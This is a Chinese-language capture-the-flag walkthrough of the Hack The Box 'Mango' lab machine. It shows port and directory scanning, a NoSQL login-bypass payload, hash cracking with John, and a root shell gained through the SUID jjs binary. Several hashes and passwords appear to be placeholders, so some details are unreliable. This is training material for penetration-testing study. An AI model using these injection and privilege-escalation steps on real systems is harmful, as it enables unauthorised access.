您好,登录后才能下订单哦!
# HTB Mango的渗透测试实例
## 前言
Hack The Box(HTB)是一个知名的网络安全在线平台,提供各种虚拟靶机供安全爱好者练习渗透测试技术。Mango是HTB上一台中等难度的Linux靶机,涉及Web应用漏洞、服务枚举、凭证破解和权限提升等多个技术点。本文将详细记录从信息收集到获取root权限的全过程。
---
## 一、环境准备
1. **连接HTB VPN**
使用OpenVPN连接HTB网络:
```bash
sudo openvpn /path/to/your/htb.ovpn
ping
或平台面板确认Mango的IP地址(假设为10.10.10.162
)。使用Nmap进行全端口扫描:
nmap -p- -T4 10.10.10.162 -oN full_scan.nmap
关键结果: - 22/tcp - OpenSSH 7.6p1 - 80/tcp - Apache httpd 2.4.29 - 443/tcp - Apache httpd 2.4.29
nmap -p22,80,443 -sV -sC 10.10.10.162 -oN service_scan.nmap
发现:
- HTTP服务存在虚拟主机mango.htb
,需添加到/etc/hosts
。
使用Gobuster扫描目录:
gobuster dir -u http://mango.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
发现/admin
和/api
路径。
访问http://mango.htb/admin
发现登录表单,尝试SQL注入:
admin' OR '1'='1' --
结果:未成功,但响应时间延迟,可能存在盲注。
通过Burp Suite拦截请求,修改为JSON格式尝试NoSQL注入:
{"username": {"$ne": ""}, "password": {"$ne": ""}}
成功绕过登录,进入后台页面。
在后台发现用户mango
和admin
的凭据哈希:
mango: 5e3e8a9d5a9d5a9d5a9d...
admin: 6f8e8a9d5a9d5a9d5a9d...
使用John破解:
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
破解结果:
- mango: mango123
- admin: admin123
尝试用破解的密码登录SSH:
ssh mango@10.10.10.162
成功获取user.txt:/home/mango/user.txt
查找具有SUID权限的文件:
find / -perm -4000 2>/dev/null
发现/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
。
通过jjs执行系统命令:
var BufferedReader = Java.type("java.io.BufferedReader");
var InputStreamReader = Java.type("java.io.InputStreamReader");
var Process = Java.type("java.lang.ProcessBuilder");
var p = new Process(["/bin/sh"]).start();
var reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
var line = "";
while ((line = reader.readLine()) != null) { print(line); }
获取root shell:
whoami # root
cat /root/root.txt
用途 | 命令示例 |
---|---|
端口扫描 | nmap -p- -T4 <IP> |
NoSQL注入 | {"username": {"$ne": ""}} |
破解哈希 | john --format=raw-md5 hashes.txt |
SUID枚举 | find / -perm -4000 2>/dev/null |
”`
注:实际测试时需替换IP、哈希值等具体数据,并遵守HTB规则。本文仅作技术学习参考。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。